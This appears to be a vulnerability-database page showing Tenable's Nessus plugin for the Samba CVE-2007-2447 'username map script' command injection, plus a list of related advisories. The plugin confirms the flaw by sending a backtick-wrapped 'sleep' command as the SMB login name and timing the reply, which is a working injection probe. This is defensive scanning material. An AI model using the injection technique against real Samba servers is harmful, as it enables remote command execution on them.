Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.SAMBA_3_LOGIN_RCE.NASL
HistoryApr 06, 2015 - 12:00 a.m.

Samba 3.0.0 'SamrChangePassword' RCE

2015-04-0600:00:00
This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
171
JSON

The version of Samba running on the remote host is affected by a remote code execution vulnerability due to improper validation of user-supplied input when passing RPC messages from external scripts to a shell. A remote, authenticated attacker can exploit this via the use of shell metacharacters during login negotiations when the ‘username map script’ option is enabled, or during the invocation of other printer and file management MS-RPC calls.

#
# (C) Tenable Network Security, Inc.
#
# @NOAGENT@
#

include("compat.inc");

if (description)
{
  script_id(82580);
  script_version("1.8");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/09");

  script_cve_id("CVE-2007-2447");
  script_bugtraq_id(23972);
  script_xref(name:"CERT", value:"268336");

  script_name(english:"Samba 3.0.0 'SamrChangePassword' RCE");
  script_summary(english:"Attempts to exploit the issue.");

  script_set_attribute(attribute:"synopsis", value:
"The file and print server running on the remote host is affected by a
remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Samba running on the remote host is affected by a
remote code execution vulnerability due to improper validation of
user-supplied input when passing RPC messages from external scripts to
a shell. A remote, authenticated attacker can exploit this via the use
of shell metacharacters during login negotiations when the 'username
map script' option is enabled, or during the invocation of other
printer and file management MS-RPC calls.");
  script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/security/CVE-2007-2447.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 3.0.25 or later");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2007-2447");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Samba "username map script" Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/05/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2007/05/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/04/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:samba:samba");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("smb_nativelanman.nasl");
  script_require_keys("SMB/NativeLanManager");
  script_exclude_keys("global_settings/supplied_logins_only");
  script_require_ports("Services/smb", 139, 445);

  exit(0);
}

include("smb_func.inc");
include("global_settings.inc");
include("misc_func.inc");
include("audit.inc");

lanman = get_kb_item_or_exit("SMB/NativeLanManager");
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

port     = kb_smb_transport();

if("Samba" >!< lanman)
  audit(AUDIT_NOT_DETECT,"Samba",port);

timings  = make_list(3,9,15);
variance = 2;

report = NULL;
foreach timing (timings)
{
  if(!smb_session_init(timeout:timing+variance+1, report_access_trouble:FALSE, report_auth_failure:FALSE))
    audit(AUDIT_FN_FAIL, 'smb_session_init');
  
  cmd   = 'sleep '+timing;
  login = '`' + cmd + '`';
  then  = unixtime();
  retv  = NetUseAdd(login:login, password:rand_str(length:8), share:"IPC$");
  now   = unixtime();
  delta = now-then;
  if(delta < timing || delta > timing+variance)
    audit(AUDIT_LISTEN_NOT_VULN,"Samba",port);
  else
    report += '\n    '+cmd+" (server's response was delayed by "+delta+" seconds)";
  NetUseDel();
}

if(isnull(report))
  audit(AUDIT_LISTEN_NOT_VULN,"Samba",port);

report = '\n  Nessus was able to run the following commands : '+report+'\n';
security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);
VendorProductVersionCPE
sambasambacpe:/a:samba:samba

Related

nessus 22
metasploit 1
prion 2
securityvulns 4
debiancve 1
samba 1
packetstorm 1
openvas 56
cve 2
seebug 2
cert 1
ubuntucve 1
exploitdb 1
redhatcve 1
oraclelinux 2
redhat 1
debian 6
centos 2
fedora 2
ubuntu 1
slackware 1
gentoo 1
suse 1
osv 1
altlinux 1
freebsd 1
avleonov 1
vmware 1
nessus
nessus
openSUSE 10 Security Update : samba (samba-3828)
2007-10-17 00:00:00
SuSE 10 Security Update : Samba (ZYPP Patch Number 3829)
2007-12-13 00:00:00
openSUSE 10 Security Update : samba (samba-3827)
2007-10-17 00:00:00
metasploit
metasploit
Samba "username map script" Command Execution
2010-02-16 00:26:41
prion
prion
Code injection
2007-05-14 21:19:00
Design/Logic Flaw
2007-07-27 22:30:00
securityvulns
securityvulns
[SAMBA-SECURITY] CVE-2007-2447: Remote Command Injection Vulnerability
2007-05-15 00:00:00
iDefense Security Advisory 05.14.07: Samba SAMR Change Password Remote Command Injection Vulnerability
2007-05-15 00:00:00
Samba file server multiple security vulnerabilities
2007-05-16 00:00:00
debiancve
debiancve
CVE-2007-2447
2007-05-14 21:19:00
samba
samba
Remote Command Injection Vulnerability
2007-05-14 00:00:00
packetstorm
packetstorm
Samba "username map script" Command Execution
2010-02-17 00:00:00
openvas
openvas
SLES9: Security update for Samba
2009-10-10 00:00:00
SLES9: Security update for Samba
2009-10-10 00:00:00
Samba MS-RPC Remote Shell Command Execution Vulnerability (Version Check)
2016-10-31 00:00:00
cve
cve
CVE-2007-2447
2007-05-14 21:19:00
CVE-2007-4044
2007-07-27 22:30:00
seebug
seebug
Samba "username map script" Command Execution
2014-07-01 00:00:00
Mac OS X 2007-007更新修复多个安全漏洞
2007-08-02 00:00:00
cert
cert
Samba command injection vulnerability
2007-05-14 00:00:00
ubuntucve
ubuntucve
CVE-2007-2447
2007-05-14 00:00:00
exploitdb
exploitdb
Samba 3.0.20 &lt; 3.0.25rc3 - &#039;Username&#039; map script&#039; Command Execution (Metasploit)
2010-08-18 00:00:00
redhatcve
redhatcve
CVE-2007-4044
2015-10-30 10:29:07
oraclelinux
oraclelinux
Critical: samba security update
2007-05-14 00:00:00
samba security and bug fix update
2009-10-27 00:00:00
redhat
redhat
(RHSA-2007:0354) Critical: samba security update
2007-05-14 00:00:00
debian
debian
[SECURITY] [DSA 1291-2] New samba packages fix multiple vulnerabilities
2007-05-17 12:29:25
[SECURITY] [DSA 1291-2] New samba packages fix multiple vulnerabilities
2007-05-17 00:00:00
[SECURITY] [DSA 1291-4] New samba packages fix regression
2007-06-04 00:00:00
centos
centos
samba security update
2007-05-14 17:11:04
samba security update
2007-05-14 23:38:47
fedora
fedora
[SECURITY] Fedora Core 6 Update: samba-3.0.24-5.fc6
2007-05-14 17:22:17
[SECURITY] Fedora Core 5 Update: samba-3.0.24-5.fc5
2007-05-14 17:21:19
ubuntu
ubuntu
Samba vulnerabilities
2007-05-16 00:00:00
slackware
slackware
[slackware-security] samba
2007-05-15 03:03:31
gentoo
gentoo
Samba: Multiple vulnerabilities
2007-05-15 00:00:00
suse
suse
remote code execution in samba
2007-05-22 14:13:43
osv
osv
samba
2007-05-15 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 5 package samba version 3.0.25-alt1
2007-05-14 00:00:00
freebsd
freebsd
samba -- multiple vulnerabilities
2007-05-14 00:00:00
avleonov
avleonov
Vulnerability Management at Tinkoff Fintech School
2019-03-04 10:38:31
vmware
vmware
Updated versions of all supported hosted products and all ESX 2x products and patches for ESX 30x address critical security updates. Service Console security updates for samba, bind, krb5, vixie-cron, shadow-utils, openldap, pam, gcc, and gdb packages.
2007-09-18 00:00:00
JSON
Related for SAMBA_3_LOGIN_RCE.NASL
nessus22metasploit1prion2securityvulns4debiancve1samba1packetstorm1openvas56cve2seebug2cert1ubuntucve1exploitdb1redhatcve1oraclelinux2redhat1debian6centos2fedora2ubuntu1slackware1gentoo1suse1osv1altlinux1freebsd1avleonov1vmware1